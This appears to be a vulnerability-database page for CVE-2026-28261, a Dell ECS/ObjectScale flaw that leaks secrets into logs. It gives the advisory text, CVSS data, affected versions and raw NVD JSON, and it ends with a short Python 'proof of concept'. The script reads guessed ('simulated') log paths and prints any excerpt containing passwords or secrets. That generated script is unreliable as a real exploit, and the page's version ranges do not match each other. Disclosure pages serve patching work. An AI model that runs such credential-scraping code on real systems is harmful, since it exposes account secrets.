Security Vulnerability Report
CVE-2026-28261 CVSS 7.8 HIGH

CVE-2026-28261

Published: 2026-04-08 13:16:42
Last Modified: 2026-04-13 18:20:22

Description

Dell Elastic Cloud Storage, version 3.8.1.7 and prior, and Dell ObjectScale, versions prior to 4.1.0.3 and version 4.2.0.0, contain an Insertion of Sensitive Information into Log File vulnerability. A low-privileged attacker with local access could potentially exploit this vulnerability, leading to secret exposure. The attacker may be able to use the exposed secret to access the vulnerable system with privileges of the compromised account.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:dell:elastic_cloud_storage:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:dell:objectscale:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:dell:objectscale:4.2.0.0:*:*:*:*:*:*:* - VULNERABLE
Dell Elastic Cloud Storage <= 3.8.1.7
Dell ObjectScale < 4.1.0.3
Dell ObjectScale 4.2.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-28261
# This script demonstrates a local attacker searching for sensitive data in logs.
import os

# Simulated log file paths for Dell products
LOG_PATHS = [
    "/var/log/dell/objectscale/audit.log",
    "/var/log/dell/ecs/system.log"
]


def exploit():
    print("[*] Attempting to read log files...")
    for path in LOG_PATHS:
        if os.path.exists(path):
            try:
                with open(path, 'r') as f:
                    content = f.read()
                # Check for common sensitive patterns
                if "password" in content or "secret" in content:
                    print(f"[!] Potential sensitive data found in: {path}")
                    print(f"[+] Excerpt: {content[:100]}...")
                    return True
            except PermissionError:
                print(f"[-] Permission denied for {path}")
    print("[-] No sensitive data found in default paths.")
    return False


if __name__ == "__main__":
    exploit()

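References

https://www.dell.com/support/kbdoc/en-us/000449325/dsa-2026-143-security-update-for-dell-objectscale-prior-to-4-1-0-3-and-4-2-0-0-insertion-of-sensitive-information-into-log-file-vulnerability (Vendor Advisory)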

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-28261", "sourceIdentifier": "[email protected]", "published": "2026-04-08T13:16:41.533", "lastModified": "2026-04-13T18:20:21.650", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell Elastic Cloud Storage, version 3.8.1.7 and prior, and Dell ObjectScale, versions prior to 4.1.0.3 and version 4.2.0.0, contains an Insertion of Sensitive Information into Log File vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to secret exposure. The attacker may be able to use the exposed secret to access the vulnerable system with privileges of the compromised account."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-532"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dell:elastic_cloud_storage:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.2.0.1", "matchCriteriaId": 
"950FB7D3-F08F-4FB1-8755-B0BE20AF7299"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dell:objectscale:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.1.0.3", "matchCriteriaId": "748662DA-E2CE-45DB-B05E-0C91B27FF232"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dell:objectscale:4.2.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "811FBEA7-6305-4DC7-B082-51C3A78C192D"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000449325/dsa-2026-143-security-update-for-dell-objectscale-prior-to-4-1-0-3-and-4-2-0-0-insertion-of-sensitive-information-into-log-file-vulnerability", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}